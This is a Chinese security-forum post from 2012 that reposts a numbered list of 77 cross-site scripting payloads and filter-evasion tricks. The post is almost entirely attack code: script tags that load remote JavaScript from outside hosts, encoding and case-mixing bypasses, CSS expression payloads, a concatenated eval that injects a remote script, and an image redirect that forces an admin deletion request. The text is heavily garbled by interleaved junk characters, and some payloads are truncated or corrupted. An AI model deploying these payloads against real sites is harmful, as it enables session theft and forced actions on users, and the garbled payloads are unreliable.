貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。9 \* O: ?6 I X' H
# N" g* n$ ^7 Q% T
(1)普通的XSS JavaScript注入
$ f8 ]1 h' w& i: V3 c$ u9 ~ <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 l- c( W$ I9 G2 t) H6 S4 ^
- _, ^4 o& H. U$ s) _) Q (2)IMG标签XSS使用JavaScript命令% i8 t2 ^. S! |- s( R( e
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, j. w9 O$ p# n1 \5 t4 p# s
- r) f$ {2 p Z0 u4 O5 Q9 m* Y (3)IMG标签无分号无引号6 b& n) l( R9 ~! A* H3 B% Z
<IMG SRC=javascript:alert(‘XSS’)>8 E' I8 I/ T0 O1 L
7 r: g& G K, k4 A$ _7 d
(4)IMG标签大小写不敏感, _' n7 z1 J/ N: B9 b: z: D0 A: `
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 B; P1 Q* {8 @7 d/ R' e4 G
) j( N( l( |& i( v! e' x* V% P (5)HTML编码(必须有分号)9 u& @" X7 L3 R( W v' f
<IMG SRC=javascript:alert(“XSS”)>( M3 q% q6 V, z9 d
/ w# l5 O) @5 L" o& b! X (6)修正缺陷IMG标签
" `4 D. g% T; }4 l# p# v: @& c, a <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. } @& ^, _ j4 x' n& p
6 E6 I B( T3 s( R+ r& q" ? (7)formCharCode标签(计算器)
; f# U8 \7 {: H; [ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 U" |# e4 R/ k( l
/ I3 ?/ F7 V! R% Y
(8)UTF-8的Unicode编码(计算器)
) z% s9 O8 t7 ~# }& f) i* C0 w+ Z <IMG SRC=jav..省略..S')>0 C5 o, R, q4 M9 _0 V, r' [5 @$ y
9 P# x& U O4 K* a, O: w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ w' Q: k1 F( m/ Z6 L
<IMG SRC=jav..省略..S')>) Q/ J( @* a: p2 ]: z! d& B) k4 p* V& f
' f9 B% ~, H2 @5 v: B
(10)十六进制编码也是没有分号(计算器)
9 @' v) S5 J8 ]! X8 D- n- b <IMG SRC=java..省略..XSS')>9 o/ p; T H, q$ l, \) m
: L# }' v+ f0 t( M (11)嵌入式标签,将Javascript分开) S% O% d0 f; b" u ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 ?1 N6 D' s$ d3 W( j
' H0 p r ]5 ]
(12)嵌入式编码标签,将Javascript分开
, g; B% t$ R7 l# g) }- V, R <IMG SRC=”jav ascript:alert(‘XSS’);”>
& F5 v+ i8 M; L2 |) ^. }
1 E! a! z a# b& I$ c" p (13)嵌入式换行符6 z% e/ M4 n* r& x7 z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 H: R9 b. v. f+ D/ @/ ]2 g. L7 X! c' x8 l8 [2 f6 `* T( O7 M
(14)嵌入式回车+ v4 f3 g/ {" e
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- L8 A2 t6 l( {( q! J1 |2 R' W- p/ N, [9 v7 I
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ B9 T/ W8 V* k$ E( i1 ?& [ <IMG SRC=”javascript:alert(‘XSS‘)”>* u# \7 u, W5 W5 G i4 ~/ r
, _3 w, @9 p3 j: n
(16)解决限制字符(要求同页面)# {! r/ |+ }* g5 w: Y
<script>z=’document.’</script>+ D" P) A) S+ U/ V
<script>z=z+’write(“‘</script>0 u0 _6 X% J/ b) I' l
<script>z=z+’<script’</script># ^ O8 B6 p( t9 ^, B
<script>z=z+’ src=ht’</script>+ {, w3 J0 k5 k4 w8 R
<script>z=z+’tp://ww’</script>, j' u% n; V) x( _
<script>z=z+’w.shell’</script>
% h1 K6 b) F& ^6 P <script>z=z+’.net/1.’</script>, Z& \5 |) t7 l P6 d! f
<script>z=z+’js></sc’</script>/ I; l& I- \5 u5 x1 Y
<script>z=z+’ript>”)’</script>! ^, |+ I9 f7 h7 P6 _$ V I# D& F4 Z8 F
<script>eval_r(z)</script>! o8 i. e+ E6 h, ~# ]
+ A+ J0 g, f X/ N+ N$ @6 y ~$ p (17)空字符
) ?, p, G1 t! q v perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# v( t' ]# m) }
4 ?3 |- ?0 |# b$ x7 T3 D+ O
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* [) R: ]( R; B; Y+ v" u* O' W
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! a7 W; F1 @9 V) g8 \
5 g7 d) A$ F% d8 x2 R8 {% ^' Z' R5 s (19)Spaces和meta前的IMG标签
9 F% j7 b4 ~: R/ _) S! M5 T <IMG SRC=” � javascript:alert(‘XSS’);”>6 w' e. C$ f' r8 h9 F: x0 _. Z
W" r6 h- g ?6 `( f
(20)Non-alpha-non-digit XSS
7 ?6 } ^8 w! l; ~7 { <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ y) ]+ ?) q: g
/ j; J% h1 ^# ^8 w6 }/ K (21)Non-alpha-non-digit XSS to 2
! d# ]. L- v$ @$ [+ T <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) \8 c) x. A+ s( n5 A ]
' D; N+ a+ ~6 e+ r. \( x' v6 H6 T (22)Non-alpha-non-digit XSS to 3
. U/ u; U4 n/ h* m9 y' M0 C <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 K- o% @1 E. Z* r+ G; C& T9 _7 r
& D+ p" f( I) t/ W3 e (23)双开括号
: W9 L3 _, s+ I& H M& |0 h3 p <<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 g; ^: q) r- X, |0 K4 b9 H5 \! t( f9 @# A
(24)无结束脚本标记(仅火狐等浏览器)
2 f, {, v/ E* Z; s* } <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
1 C5 A1 q7 x/ N4 y, O/ K# B1 |. v; l
4 m7 n* X6 U, K (25)无结束脚本标记2& N! L) e. x' T; E
<SCRIPT SRC=//3w.org/XSS/xss.js>+ w" k4 S2 v2 e
" _! G w$ w; |; \ L (26)半开的HTML/JavaScript XSS
( R5 e# }4 s9 m: s" j <IMG SRC=”javascript:alert(‘XSS’)”
6 g% C/ ]) l0 D) D5 ?( x! N2 u
4 R; B# t9 \- k3 |+ U4 j (27)双开角括号 j; H* v% D7 Q, j: t, p: W: L
<iframe src=http://3w.org/XSS.html <* L1 u3 d2 E1 ?+ o. n
( O/ j& \3 P3 o+ @: M) p (28)无单引号 双引号 分号
$ r% F/ Y6 v: h \7 P- y! x <SCRIPT>a=/XSS/% h+ I4 Q& z9 }! o9 i+ c0 R
alert(a.source)</SCRIPT>
& i" {; b/ h9 R
: D* ?) w4 @/ d; L6 o (29)换码过滤的JavaScript
' b9 B2 Z4 q) p$ }$ [ \”;alert(‘XSS’);//
/ [# t+ B6 P4 x& l9 `2 Y5 o/ e' U7 m6 Z% {' @1 e# K
(30)结束Title标签# z% }) c) q/ ~* A o' G g
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
$ t$ {0 r% k/ I3 A
: u! i, v9 M9 D# y (31)Input Image
4 m) v+ S& K9 R7 ~! G9 m$ q <INPUT SRC=”javascript:alert(‘XSS’);”>7 W7 R3 q' Q3 W& ~
3 s* C q. h8 o6 R' M! T* Z (32)BODY Image9 o$ N7 I3 y4 V/ z4 [5 \8 }. ^5 j5 O
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 K' Z1 t" d: t+ |* L3 F. s
- z6 }7 A3 X! m7 f9 j$ I6 ~, g (33)BODY标签
- h4 G! i5 I X, R <BODY(‘XSS’)>
4 C5 W2 ~+ o1 j' H
8 ?- ]# T" [ P8 s& r (34)IMG Dynsrc% f* v3 z2 D( C9 E9 b: @7 F
<IMG DYNSRC=”javascript:alert(‘XSS’)”># ?1 K" n0 W: N3 r& j3 |/ P" y
- J2 k" U p+ e7 a
(35)IMG Lowsrc
/ v B, D% T* X) f/ T <IMG LOWSRC=”javascript:alert(‘XSS’)”># O9 O& |4 `/ K" x, ~
: W- o' V0 b2 P( ^- t& Z (36)BGSOUND8 P; |( V! r; M" u1 L% X; w
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 l+ _& P. I8 P$ i8 s
$ ]3 \( T1 Q& V9 j, R (37)STYLE sheet
7 W) v' ?# E& s% |6 F" s. t <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 |/ A0 L) r5 b, i4 Z+ I0 D9 R7 _# c1 ? u1 \/ ~
(38)远程样式表3 B- Y/ u) s [. f
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>4 A# ]4 m- {! U7 o- D
% D i) V$ c( x( x( V (39)List-style-image(列表式)
2 M6 a) e, h: \" ]' g <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
. A; J, e5 |9 i4 }# c5 I
$ d# x' \5 _0 E (40)IMG VBscript
+ D' C" D# x3 a4 f1 W7 x; z' z% @( [% d <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS' x7 n# ^0 t1 ]3 a; s# [( n; i% O
" s: V4 k( P3 B1 x; K (41)META链接url
/ g8 Y/ {+ G& ~! E7 }% Z <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>7 z) s J" R8 P- g- e4 q! a
3 z# y$ Y: I! w& X6 r
(42)Iframe
7 F* I: ~; g# O$ c <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME># }4 h9 P; L' j+ @* K
1 g, C! L+ k# U% O* C6 j (43)Frame \& w5 U, j% G
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
, Y9 ^: ]1 q! M8 X" d8 C F: u9 i5 ~' ^# s9 E$ |; L
(44)Table7 b& c2 ]+ Y( f6 u. e: R# O
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! t# v% `9 ^+ B; D( r, i1 x
$ y5 r' o" r% P2 y" v, @: e, R (45)TD" x8 y& `1 {8 [1 F* n7 {
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>6 ^, \6 `2 d+ K$ F8 n1 A
/ {, A# b# \1 G/ K0 F; W8 ^ (46)DIV background-image9 J; O" C4 }! ]; U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' _" _# X) l; H& G7 [- W
; N3 O# F. K4 N- Q! ^) V (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
- K6 [7 I p4 }8 J! c. x <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
* m4 [2 W* p5 G- ^; i. D# s$ B4 M$ G N6 \% r3 E( A
(48)DIV expression5 d) V: ] l) U* L" ~1 `1 h% {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" ]% o% v" P. [5 \8 } E2 ~; B' y& p9 r% U( w
(49)STYLE属性分拆表达
; n' u2 ?6 ~2 q- O+ \ <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; i% u# b) i1 D, c" C! \0 K. v; g
(50)匿名STYLE(组成:开角号和一个字母开头)3 G1 x+ G9 F8 T* o8 J" K- ~4 n; m8 r
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 }! C1 @( S0 [; r( I- p3 K: ^2 P: c
- s- X( U0 p0 g (51)STYLE background-image7 Q" a( n& k4 B6 L2 u( T F/ @& z
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( E9 p, `' ?* o P Y. d7 z" F
- H) T% x8 H+ G (52)IMG STYLE方式
9 c2 R% N& a" z exppression(alert(“XSS”))’>% W( e1 ], e5 @4 I0 m; [
2 ?( [& T6 B( Z( X) w) P
(53)STYLE background& p0 B v0 D( {. x$ g! t
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
8 \. T. z8 ^+ x* `; ?/ C
8 h1 q3 d* O# h7 @% D# R (54)BASE
' [( W5 D, T/ C5 [' \( v5 M <BASE HREF=”javascript:alert(‘XSS’);//”># o, ~, G/ S+ V9 Y( c( n% J0 u0 L
. p8 O# l7 r0 t& |! `* b6 \ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
+ e( Y' {; Q1 k" ^$ ` <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>) a8 t& c7 Y9 H% q/ l
6 ^2 d. ^' i% W9 d (56)在flash中使用ActionScrpt可以混进你XSS的代码
, d! J' u* I. j4 ? a=”get”;
8 S& k6 P% l& p; B! q0 w& p' F6 n b=”URL(\”";
% F1 ]) f$ L+ \ }2 s; U$ C! r c=”javascript:”;
0 @4 i* X; |& P4 Z; u2 D d=”alert(‘XSS’);\”)”;4 t6 }- f1 j3 k. [3 Z( ]
eval_r(a+b+c+d);4 _- s# i+ E( \7 e- ~) N8 ?/ b" y
8 m9 M" B/ W9 i2 y! h. L (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上+ ^$ ~$ j% F8 Y; d
<HTML xmlns:xss>7 j& K# Q6 ?0 I7 b% V& S
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># [7 `1 n! P! W9 b( k ^9 k( ]
<xss:xss>XSS</xss:xss>
- H2 T" @1 ^( i+ F# P3 F! e. c' p </HTML>" y$ t7 j6 D5 R
) z: A6 v9 `' S3 v5 v1 p* w$ t (58)如果过滤了你的JS你可以在图片里添加JS代码来利用# Z6 a* Y9 `3 Q+ i* I$ o) h8 P+ ?
<SCRIPT SRC=””></SCRIPT>3 x6 q% W# o/ A* f
5 T9 m! w4 ]. r
(59)IMG嵌入式命令,可执行任意命令) ?% h( h% c: N; E' _' C
<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 g3 j. q/ k$ ?. c9 U4 C
; ~7 Y$ I, K) q9 J4 Q
(60)IMG嵌入式命令(a.jpg在同服务器)
, u& J3 x* I) H$ ` Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 E5 O0 U+ G( B% n: Z1 g' ~3 C9 K9 ]2 o/ ~
(61)绕符号过滤& a7 O" p2 `' S
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
l) ]6 e/ D% s* O3 u# J* Z5 J5 N) J, C9 T. N6 k
(62)$ D5 t; \, w0 r& [$ O8 \
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 [" W" t4 G! P6 d% u0 {
& m) W$ |/ |$ }4 z
(63)! L+ X* y4 z, q8 ^2 q/ z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 p/ C3 M. n+ U8 }1 ]6 W& r2 z- h$ Y5 o0 q3 k
(64)
# I* g9 |; }$ S1 t. m {8 t& q) z <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
( H7 W3 w8 B, r; j
7 Y" E7 W# J0 g (65)
' N# C* { L4 y/ C* a2 @ <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 F% V6 [6 Q( V$ U) `9 A3 {
% a" B3 l1 T( p4 n' b: { (66)
& |2 z7 F, p) B; B( S6 o( o. N% }- i <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% @" k* \! h" }/ F5 y
6 j* O% J% Z! b x; } (67)5 ]6 l" o8 G3 p! q1 `) \
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>' H5 s1 \$ l% `* ?2 T
; \% L, @7 q5 G) r# O( s8 Q
(68)URL绕行
8 I1 D& J8 z7 X, M9 e <A HREF=”http://127.0.0.1/”>XSS</A>* G- J0 Z! A# k" ]: z
1 w# `2 V1 D' `5 z: z (69)URL编码
( ], E6 w) }9 Y; I3 E2 M <A HREF=”http://3w.org”>XSS</A>5 _1 X5 w0 N( ?
1 ~- C y( @' N) r- L
(70)IP十进制2 R9 J- \2 x/ `4 e# ~
<A HREF=”http://3232235521″>XSS</A>
# ^- k0 b: @& m- b
: P9 Z" J' |; J; L# \- m) e (71)IP十六进制* e$ E' C, p* M7 y3 p9 j5 ]
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ q4 [% {2 J4 ~! l( `( C( `5 ?4 ^ U. _
(72)IP八进制# A- E( Y0 R' | O
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
% F3 s5 ~. i9 {% b# z' |
8 x5 T0 C, R; d+ e (73)混合编码1 I4 U+ j% u: l
<A HREF=”h. t" l" T/ J* Z
tt p://6 6.000146.0×7.147/”">XSS</A>& O2 Q8 U- s+ @# X, \4 G- m/ g
: L0 J+ n( P$ W* J4 l1 e
(74)节省[http:]
; i" u/ i+ z% L <A HREF=”//www.google.com/”>XSS</A>1 O' @: b0 U, I: @# U( }1 I* C
0 M1 n7 t- ]: q$ A) z (75)节省[www]& |" z- B$ V+ H/ o$ @
<A HREF=”http://google.com/”>XSS</A>
3 E' K j% t$ M" ?% p1 A9 K( [7 W* f/ z, }
(76)绝对点绝对DNS" t( o' ^! X- L; L0 z4 m
<A HREF=”http://www.google.com./”>XSS</A>
: A( {: d1 |8 R6 S. O: n ?, @
& n" _7 x! G8 d# @% J0 L (77)javascript链接
+ h! `2 P: o+ B& H p) [6 U6 @, d. v+ e. J <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对